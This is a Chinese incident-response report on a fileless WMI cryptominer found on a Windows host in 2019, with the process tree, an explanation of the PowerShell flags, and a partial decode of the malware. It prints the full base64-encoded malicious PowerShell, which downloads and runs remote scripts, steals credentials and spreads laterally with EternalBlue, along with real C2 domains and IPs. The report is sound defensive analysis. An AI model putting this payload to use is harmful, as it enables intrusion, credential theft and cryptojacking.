无文件挖矿应急响应处置报告

释放双眼,带上耳机,听听看~!

一、情况概述

1.1 情况拓扑

由于运维过程中可能存在违规操作、过失操作或者防护能力不足导致被恶意操作使得主机遭受挖矿程序的侵害,该挖矿程序会下载恶意程序至WMI中,实现无文件挖矿和内网渗透,并下载DDOS攻击程序和通过任务计划每隔20分钟自动生成版本校验恶意程序。

1.2 情况简介

2019年4月4日收到用户告警,内网主机存在CPU过高现象,同时网络异常监测预警平台告警内网主机有主动连接矿池行为。

1.3 分析思路

挖矿程序如要体现出长久稳定的产出货币价值,其基础功能实现、长期运行、自我隐藏和自我传播的基本特性必不可少。遂根据恶意人员的攻击基本意图进行分析:

1.检查挖矿运行过程;

2.检查其自我传播的方式方法;

3.检查其如何长期运行;

4.检查其如何渗透至操作系统中;

尝试通过分析以上过程,从而闭环各个恶意环节的攻击流程。

二、主机挖矿行为分析处置

2.1 现状描述

该主机CPU使用率75%:Powershell.exe占用CPU较高,对其进行检查。

2.2 父子进程对应表

wmic process得到的相关进程名、父进程、子进程经梳理后对应表如下所示:

CaptionParentProcessIdProcessId
wininit.exe348388
services.exe388504
svchost.exe504624
WmiPrvSE.exe6245148
powershell.exe51483964
powershell.exe39643180

各程序CommandLine详见后续。

2.3 wininit.exe

CommandLine:wininit.exe

Windows启动应用程序。用于启动services.exe(服务控制管理器)、lsass.exe(本地安全授权)、lsm.exe(本地会话管理器)。

2.4 services.exe

CommandLine:C:\Windows\system32\services.exe

Windows服务管理应用程序。

2.5 svchost.exe

CommandLine:C:\Windows\system32\svchost.exe-k DcomLaunch 

DCOMLAUNCH服务可启动COM和DCOM服务器,以响应对象激活请求。

2.6 WmiPrvSE.exe

CommandLine:C:\Windows\system32\wbem\wmiprvse.exe

wmiprvse.exe是微软Windows操作系统的一部分,用于通过WinMgmt.exe程序处理WMI操作。

2.7 powershell.exe(PID 3964)

 

CommandLine:powershell.exe-NoP -NonI -W Hidden -E 

 

JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQAxADEALgA5ADAALgAxADQANQAuADUAMgAnACkALAAoACcAMQA4ADUALgAyADMANAAuADIAMQA3AC4AMQAzADkAJwApACkADQAKACQAYQB2AGcAcwAgAD0AIABAACgAKQANAAoAJABuAGkAYwAgAD0AIAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAzADsAJABpACsAKwApAHsADQAKAAkAJABzAHUAbQAgAD0AIAAwAA0ACgAJACQAYwBvAHUAbgB0ACAAPQAgADAADQAKAAkAZgBvAHIAKAAkAGoAPQAxADsAJABqACAALQBsAGUAIAA0ADsAJABqACsAKwApAHsADQAKAAkACQAkAHQAbQBwACAAPQAgACgAJABwAGkAbgAuAHMAZQBuAGQAKAAkAHMAZQBbACQAaQBdACkAKQAuAFIAbwB1AG4AZAB0AHIAaQBwAFQAaQBtAGUADQAKAAkACQBpAGYAIAAoACQAdABtAHAAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAJACQAYwBvAHUAbgB0ACAAKwA9ACAAMQANAAoACQAJAH0ADQAKAAkACQAkAHMAdQBtACAAKwA9ACAAJAB0AG0AcAANAAoACQB9AA0ACgAJAGkAZgAgACgAJABjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAkAGEAdgBnAHMAIAArAD0AIAAkAHMAdQBtAC8AJABjAG8AdQBuAHQADQAKAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJACQAYQB2AGcAcwAgACsAPQAgADAADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMAApAHsADQAKAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAzADAAMAApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMABdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADEAKQB7AA0ACgAJAAkAaQBmACAAKAAkAGEAdgBnAHMAWwAxAF0AIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAkAGEAdgBnAHMAWwAxAF0AKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADEAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADIAKQB7AA0ACgAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAMwAwADAAKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkAfQANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAzACkAewANAAoACQAJAGkAZgAgACgAJABhAHYAZwBzAFsAMwBdACAALQBuAGUAIAAwACkAewANAAoACQAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAJABhAHYAZwBzAFsAMwBdACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0AZQBsAHMAZQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAzAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACgAJwA6ACcAKwAnADQANAAzACcAKQANAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdgBlAHIALgB0AHgAdAAiACkALgBUAHIAaQBtACgAKQANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewANAAoAIAAgACAAIAAkAHYAZQByAF8AdABtAHAAPQAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwB2AGUAcgAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJAB2AGUAcgBfAHQAbQBwACkAewANAAoAIAAgACAAIAAgACAAIAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvACQAbgBpAGMALwBhAG4AdABpAHYAaQByAHUAcwAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACQAcwB0AGkAbQBlAD0AWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQADQAKACQAZgB1AG4AcwAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQANAAoAJABkAGUAZgB1AG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAdQBuAHMAKQApAA0ACgBpAGUAeAAgACQAZABlAGYAdQBuAA0ACgANAAoARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBmAGkAbAB0AGUAcgAgAC0AbgBvAHQAbQBhAHQAYwBoACAAJwBXAGkAbgBkAG8AdwBzACAARQB2AGUAbgB0AHMAJwB9ACAAfABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0AA0ACgANAAoADQAKAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAPQAgAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAB8AHMAbwByAHQAIABjAHAAdQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBpAGQAfQANAAoAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoAJABlAHgAaQBzAHQAPQAkAEYAYQBsAHMAZQANAAoAaQBmACAAKAAkAHAAcwBpAGQAcwAgAC0AbgBlACAAJABuAHUAbABsACAAKQANAAoAewANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAcABzAGkAZABzACAALQBjAG8AbgB0AGEAaQBuAHMAIAAkAGwAaQBuAGUAWwAtADEAXQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADAAIAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAxADQANAA0ADQAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAFIAdQBuAEQARABPAFMAIAAiAGMAbwBoAGUAcgBuAGUAYwBlAC4AZQB4AGUAIgANAAoASwBpAGwAbABCAG8AdAAoACcAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADcANwA3ADcAIgApACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7AA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlACAAOwBpAGUAeAAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAYAAkAGYAdQBuAHMAKQApACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAgAC0AUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAAYAAkAFIAZQBtAG8AdABlAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAYAAkAG0AbwBuACwAIABgACQAbQBvAG4ALAAgACcAVgBvAGkAZAAnACwAIAAwACwAIAAnACcALAAgACcAJwApAGAAIgAiAA0ACgAgACAAIAAgACQAdgBiAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAA0ACgAgACAAIAAgACQAdgBiAHMALgByAHUAbgAoACQAYwBtAGQAbQBvAG4ALAAwACkADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AaQBtAGkAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKAGkAZgAgACgAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0ALgBsAGUAbgBnAHQAaAAgAC0AbgBlACAAMwAyACkADQAKAHsADQAKACAAIAAgACAAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0AIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABhAHMAYwBpAGkAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYQAyADUAaABZADIAdABsAGMAbQBWAGsALgB0AHgAdAAiAA0ACgB9AA0ACgANAAoAJABOAGUAdAB3AG8AcgBrAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAbgB1AGwAbAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQBwAHMAdQAnAF0ALgBWAGEAbAB1AGUADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHMAYwAnAF0ALgBWAGEAbAB1AGUADQAKAFsAYgB5AHQAZQBbAF0AXQAkAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAYwBiAGEAKQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQANAAoAewANAAoADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAUABBAGQAZAByAGUAcwBzAFQAbwBTAHQAcgBpAG4AZwANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACQAUwB1AGIAbgBlAHQATQBhAHMAawAgACAAPQAgACcAMgA1ADUALgAyADUANQAuADIANQA1AC4AMAAnAA0ACgAgACAAIAAgACQAaQBwAHMAXwBjAD0ARwBlAHQALQBuAGUAdAB3AG8AcgBrAHIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKACAAIAAgACAAJABpAHAAcwBfAGIAPQBHAGUAdAAtAEkAcABJAG4AQgAgACQASQBQAEEAZABkAHIAZQBzAHMADQAKACAAIAAgACAAJABpAHAAcwA9ACQAaQBwAHMAXwBjACsAJABpAHAAcwBfAGIADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQBpAGYAIAAoACQAbABpAG4AZQAuAGMAbwB1AG4AdAAgAC0AbABlACAANAApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQAkAGkAPQAkAGwAaQBuAGUAWwAtADMAXQAuAHMAcABsAGkAdAAoACcAOgAnACkAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACAAKAAkAGwAaQBuAGUAWwAtADIAXQAgAC0AZQBxACAAJwBFAFMAVABBAEIATABJAFMASABFAEQAJwApACAALQBhAG4AZAAgACAAKAAkAGkAIAAtAG4AZQAgACcAMQAyADcALgAwAC4AMAAuADEAJwApACAALQBhAG4AZAAgACgAJABpAHAAcwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAKwA9ACQAaQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABpAHAAIABpAG4AIAAkAGkAcABzACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAHAAIAAtAGUAcQAgACQASQBQAEEAZABkAHIAZQBzAHMAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkACQAJAGkAZgAgACgAKABUAGUAcwB0AC0AUABvAHIAdAAgACQAaQBwACkAIAAtAG4AZQAgACQAZgBhAGwAcwBlACAALQBhAG4AZAAgACQAaQBwAHMAdQAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAcgBlAHMAPQBlAGIANwAgACQAaQBwACAAJABzAGMADQAKAAkACQAJAAkACQBpAGYAIAAoACEAKAAkAHIAZQBzACAALQBlAHEAIAAkAHQAcgB1AGUAKQApAA0ACgAJAAkACQAJAAkAewBlAGIAOAAgACQAaQBwACAAJABzAGMAfQANAAoACQAJAAkACQAJACQAaQAxADcAIAA9ACAAJABpADEANwAgACsAIAAiACAAIgArACQAaQBwAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAfQANAAoADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==

 

powershell.exe是一种命令行外壳程序和脚本环境。参数简介如下所示:

序号参数简介
1-NoP不加载Windows PowerShell配置文件
2-NonI命令行运行后不和用户进行交互
3-W Hidden将命令行运行窗口隐藏
4-E接受base-64编码字符串版本的命令

个人不会代码,所以对上述base64字符串进行解码并添加代码块简意是连蒙带猜的,主要表达其中有部分内容将下一步工作指向WMI,如上所述在应急过程中进行是最好的,我当时是根据关键字查找大牛已经写过的材料进行下一步工作:

 

 


 

$pin = new-object system.net.networkinformation.ping

 

$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))

 

$avgs = @()

 

$nic = 'update.7h4uk.com'

 

for($i=0;$i -le 3;$i++){

 

    $sum = 0

 

    $count = 0

 

//判断服务端是否在线和延时情况以连接对应的域名或IP

 

    for($j=1;$j -le 4;$j++){

 

        $tmp =($pin.send($se[$i])).RoundtripTime

 

        if ($tmp -ne 0){

 

                $count += 1

 

        }

 

        $sum += $tmp

 

    }

 

    if ($count -ne 0){

 

            $avgs += $sum/$count

 

    }else{

 

            $avgs += 0

 

    }

 

    if ($i -eq 0){

 

        if (($avgs[0] -le 300) -and($avgs[0] -ne 0)){

 

            $nic = $se[0]

 

            break

 

        }

 

    }
